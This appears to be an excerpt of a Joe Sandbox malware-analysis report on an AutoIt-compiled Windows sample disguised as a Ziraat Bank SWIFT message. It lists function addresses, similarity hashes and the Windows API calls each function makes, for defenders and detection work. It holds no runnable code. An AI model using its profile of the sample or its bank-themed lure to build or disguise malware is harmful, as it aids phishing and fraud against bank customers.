Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
String ID:
API String ID: 1687444384-0
Opcode ID: c10232d80f51c0f839142d6f83d299d568fe9e2e7ddaf5d931fd644e8ff72462
Instruction ID: e46979a4aca0dbb8c1e53b99b85e2d67e5715bf45d17f00ea16e4e8ca010b3e9
Opcode Fuzzy Hash: c10232d80f51c0f839142d6f83d299d568fe9e2e7ddaf5d931fd644e8ff72462
Instruction Fuzzy Hash: 86015B71444B00EFD730DFA5D905B8EB7F0AF40321F20890EE4AA976A1CB74AA84CF45

Function 0010E32E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0010E33D
_memset.LIBCMT ref: 0010E34C
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00163D00,00163D44), ref: 0010E37B
CloseHandle.KERNEL32 ref: 0010E38D

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 6c01b17fb3680bdbc25f5975a498ca1426b480e66af6aa18f1d80cb2e8fc56c9
Instruction ID: 5718c7d6eff8077afe2ca27e550801f0a248f1121ffc01dbd440c6e27f5a387a
Opcode Fuzzy Hash: 6c01b17fb3680bdbc25f5975a498ca1426b480e66af6aa18f1d80cb2e8fc56c9
Instruction Fuzzy Hash: D7F05EF1540304BEE2105FA1EC45FBB7E5CEB04794F404421FE19EA5A2D3B59E5086A8

Function 0010EA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 000BAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 000BAFE3
Part of subcall function 000BAF83: SelectObject.GDI32(?,00000000), ref: 000BAFF2
Part of subcall function 000BAF83: BeginPath.GDI32(?), ref: 000BB009
Part of subcall function 000BAF83: SelectObject.GDI32(?,00000000), ref: 000BB033

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0010EA8E
LineTo.GDI32(00000000,?,?), ref: 0010EA9B
EndPath.GDI32(00000000), ref: 0010EAAB
StrokePath.GDI32(00000000), ref: 0010EAB9

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: a4277ae8f66e93e1ce8da728888b73115e5e604fd93ac4f956bc5653ab6c6d5d
Instruction ID: a253ab2f02d68b59e2b145efceadc7e4343b9a9c146cb4ac47d24fc636326dd3
Opcode Fuzzy Hash: a4277ae8f66e93e1ce8da728888b73115e5e604fd93ac4f956bc5653ab6c6d5d
Instruction Fuzzy Hash: 8FF05E31105259BBDB229F94EC09FCE3F59AF0A311F084101FA11614F187F855A2CBA9

Function 000DC82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 000DC84A
GetWindowThreadProcessId.USER32(?,00000000), ref: 000DC85D
GetCurrentThreadId.KERNEL32 ref: 000DC864
AttachThreadInput.USER32(00000000), ref: 000DC86B

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 0098361844021c7b1468658c7b71686fdecfb9e9c8a31f1fecb735d6c4e1be92
Instruction ID: 08fdba8907e3809c4117b56279444d08a930a5c9ffc640e1f9254c52b3757661
Opcode Fuzzy Hash: 0098361844021c7b1468658c7b71686fdecfb9e9c8a31f1fecb735d6c4e1be92
Instruction Fuzzy Hash: CBE0307154122476EB301B61EC0DEDB7F5CEF057A1F408011B50984950CA718592D7F0

Function 000DB0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000DB0D6
OpenThreadToken.ADVAPI32(00000000,?,?,?,000DAC9D), ref: 000DB0DD
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,000DAC9D), ref: 000DB0EA
OpenProcessToken.ADVAPI32(00000000,?,?,?,000DAC9D), ref: 000DB0F1

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: c99fd0bd9fd5d2cf1d7edf287b8960583c4995fe4d9cd35517706e6e24d38298
Instruction ID: a6ab596a6cc07bd52ee936dd2ac26f32aaa831dee13f9fa6a74ffc1b6237d0f0
Opcode Fuzzy Hash: c99fd0bd9fd5d2cf1d7edf287b8960583c4995fe4d9cd35517706e6e24d38298
Instruction Fuzzy Hash: 8EE04F72601311EBD7705FB2EC0CB573BA8EF55791F128818B241D6450DA2484928760

Function 000BB47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 000BB496
SetTextColor.GDI32(?,000000FF), ref: 000BB4A0
SetBkMode.GDI32(?,00000001), ref: 000BB4B5
GetStockObject.GDI32(00000005), ref: 000BB4BD
GetWindowDC.USER32(?,00000000), ref: 0011DE2B
GetPixel.GDI32(00000000,00000000,00000000), ref: 0011DE38
GetPixel.GDI32(00000000,?,00000000), ref: 0011DE51
GetPixel.GDI32(00000000,00000000,?), ref: 0011DE6A
GetPixel.GDI32(00000000,?,?), ref: 0011DE8A
ReleaseDC.USER32(?,00000000), ref: 0011DE95

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 696270bdf1c4cc6a08b8c7ae246dc520781a885fc3d17192bd2ead83eedd0274
Instruction ID: 95b8e869e4c8a270fdd1f3b90631fc959ddb08e7c5ca07ed753acc5b84db836e
Opcode Fuzzy Hash: 696270bdf1c4cc6a08b8c7ae246dc520781a885fc3d17192bd2ead83eedd0274
Instruction Fuzzy Hash: 12E0ED31100240BBDF355B78FC0DBD83B11AB55336F14C666F669584E1C7B185E2DB11

Function 0011B29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0011B29A
GetDC.USER32(00000000), ref: 0011B2A4
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0011B2C3
ReleaseDC.USER32 ref: 0011B2E2

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: cb28a75a6b6ed3904e94b5810613bfd7a8850089add3fa325885c43662a92e6f
Instruction ID: 98a8115e52f12d6fcd598609c12ba7dc13517f240c2b7861275f7416d5be2424
Opcode Fuzzy Hash: cb28a75a6b6ed3904e94b5810613bfd7a8850089add3fa325885c43662a92e6f
Instruction Fuzzy Hash: B0E04FB1100204FFDB105F70EC4C6AD7BA5FB4C351F11C81AFC5A87611DB7898928B40

Function 000DB2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 000DB2DF
UnloadUserProfile.USERENV(?,?), ref: 000DB2EB
CloseHandle.KERNEL32(?), ref: 000DB2F4
CloseHandle.KERNEL32(?), ref: 000DB2FC

Part of subcall function 000DAB24: GetProcessHeap.KERNEL32(00000000,?,000DA848), ref: 000DAB2B
Part of subcall function 000DAB24: HeapFree.KERNEL32(00000000), ref: 000DAB32

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: ebc3cc00b278b833db7b6c1ed88934510f9102d312ae3f080ee5dd2ea5fcfe70
Instruction ID: 8e971d37c0150c354e10e92d78ffbf9aa6afdc3f2b2ae06ba2957c8ed3f3dd21
Opcode Fuzzy Hash: ebc3cc00b278b833db7b6c1ed88934510f9102d312ae3f080ee5dd2ea5fcfe70
Instruction Fuzzy Hash: B0E0BF76104005BBCB116B95EC08859FB76FF893213108222F61581971CB3294B2EB51

Function 0011B2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0011B2AE
GetDC.USER32(00000000), ref: 0011B2B8
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0011B2C3
ReleaseDC.USER32 ref: 0011B2E2

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 1cef1cad9c9d9801fdef59a42c8cc6b696047c81e5ee241b71891fc2190c7df1
Instruction ID: 04e08630bc3fae24f662fa30a2001212f33bb3b86a5baeba410ad231ab08d5bd
Opcode Fuzzy Hash: 1cef1cad9c9d9801fdef59a42c8cc6b696047c81e5ee241b71891fc2190c7df1
Instruction Fuzzy Hash: 10E046B1500200FFDB205F70EC4C6ADBBA9FB4C351F11881AF95A8B621DB7898928B00

Function 000DDCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 000DDEAA

Strings

AutoIt3GUI, xrefs: 000DDE22
Container, xrefs: 000DDE29

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 2c8bd3f9e41c1add25374db9334578a3690d0bab60e3eecb8dba9b2e62a57e39
Instruction ID: e826dfb4a93b1d2a8fd39e7d08e387d77a96c251345c3257c8852084e3d9e3eb
Opcode Fuzzy Hash: 2c8bd3f9e41c1add25374db9334578a3690d0bab60e3eecb8dba9b2e62a57e39
Instruction Fuzzy Hash: 61912470600701AFDB64DF64C884A6ABBF9BF49710B20856EF84ADF791DB71E841CB60

Function 000BBCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 000BBCDA
GlobalMemoryStatusEx.KERNEL32 ref: 000BBCF3

Strings

@, xrefs: 000BBCE8

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 0eb8d7e48a1a8ff178427a701e332cb0c9d78326495fceb52d93247e584045cf
Instruction ID: c5d3769fd94ec26606eb5dea9a56ef17683c162a07ac91c3a96b9bb67dbbca5a
Opcode Fuzzy Hash: 0eb8d7e48a1a8ff178427a701e332cb0c9d78326495fceb52d93247e584045cf
Instruction Fuzzy Hash: 26512472408748DBE320AF14DC86BEFBBE8FF95354F41485EF5C8420A6EB7185A88756

Function 000EC56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 000A44ED: __fread_nolock.LIBCMT ref: 000A450B

_wcscmp.LIBCMT ref: 000EC65D
_wcscmp.LIBCMT ref: 000EC670

Strings

FILE, xrefs: 000EC5A5

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 8626b1ade8a0ed1e0d4401ae5211d3ca4ed1aeba0c4767af32111eca5deea16d
Instruction ID: 4058ae9743d02b8a75665978496eadebfd49465c122b41c7b06f89dce8d6158c
Opcode Fuzzy Hash: 8626b1ade8a0ed1e0d4401ae5211d3ca4ed1aeba0c4767af32111eca5deea16d
Instruction Fuzzy Hash: D641D876A0064ABEDF209BE49C42FEF77B9AF89714F000069F505FB182D7B19A058751

Function 0010A76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0010A85A
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0010A86F

Strings

', xrefs: 0010A7C3

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 3ccb24240f1f2454b3761f2f2659b3e8ebdf2387561a8de62dd4395be9b7032a
Instruction ID: 533239c9931239482ab4a94894d65a432d64c117667258d72523a11a0d880546
Opcode Fuzzy Hash: 3ccb24240f1f2454b3761f2f2659b3e8ebdf2387561a8de62dd4395be9b7032a
Instruction Fuzzy Hash: 41410875E00309AFDB54CF68D880BDA7BB9FF08300F55406AE945AB391D7B1A942CFA1

Function 000F5180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000F5190
InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 000F51C6

Strings

|, xrefs: 000F51B5

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: eba68cb8694c951add0428907b5ea7b89f1f4c2443d07a0d1a4f0e29a6810b6f
Instruction ID: 40df7ef14aaaa11ec51039a8402fbc555910bd6b17bbadba9baec477dc9738fa
Opcode Fuzzy Hash: eba68cb8694c951add0428907b5ea7b89f1f4c2443d07a0d1a4f0e29a6810b6f
Instruction Fuzzy Hash: 38313771C00109ABDF55EFE4CC85EEEBFB9FF19700F000119E905A6166EB31AA06DBA0

Function 0010975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 0010980E
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0010984A

Strings

static, xrefs: 001097AA

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 86e6106b18c030b13a039efa801dfd8fc19d9f4d19029f2886a296fb9e38831f
Instruction ID: e8e2256665a8b62337124e12330c0b05d9ce22396385078024f644d066b9d9ea
Opcode Fuzzy Hash: 86e6106b18c030b13a039efa801dfd8fc19d9f4d19029f2886a296fb9e38831f
Instruction Fuzzy Hash: 1C317E71110608AAEB109F74CC90BFB77A9FF59760F00861AF9A9C7191DB71AC91CB60

Function 000DC2DE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 000DC2F7
SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 000DC331

Strings

@U=u, xrefs: 000DC2F7, 000DC331

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: 16d964b6508dd9193edffb3a61fadc4d89653c097275f21433627faab9b2899e
Instruction ID: 8d74d34742630e28efcbe31d1a73bdc36c227af959b8a0576a868f6d03440794
Opcode Fuzzy Hash: 16d964b6508dd9193edffb3a61fadc4d89653c097275f21433627faab9b2899e
Instruction Fuzzy Hash: E021FD72D00316ABDB15AF98D881DEFB7B5EF89700B118126F505A7391EB705D42CB70

Function 000E5157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000E51C6
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 000E5201

Strings

0, xrefs: 000E51BF

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 580ed21707a455f854826fff82cf57d2bfc0c9046dc732c6e8d2961d0c7e83aa
Instruction ID: bafaeea95bc2075da699db59ce822175ae08791b499b4a8ae8368dc7e2c4db8e
Opcode Fuzzy Hash: 580ed21707a455f854826fff82cf57d2bfc0c9046dc732c6e8d2961d0c7e83aa
Instruction Fuzzy Hash: FB312531600345AFEB64CF9ADC44BEEBBF4BF42359F14081DEA81B61A0E7709A44CB11

Function 000F658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 000F6608

Strings

AUTOITCALLVARIABLE%d, xrefs: 000F65FA
, $, xrefs: 000F6648

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: __snwprintf
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 2391506597-2584243854
Opcode ID: 063df07d83f95391e42314824a11b114bf6e5aeac5079aa33efe2e9f72259197
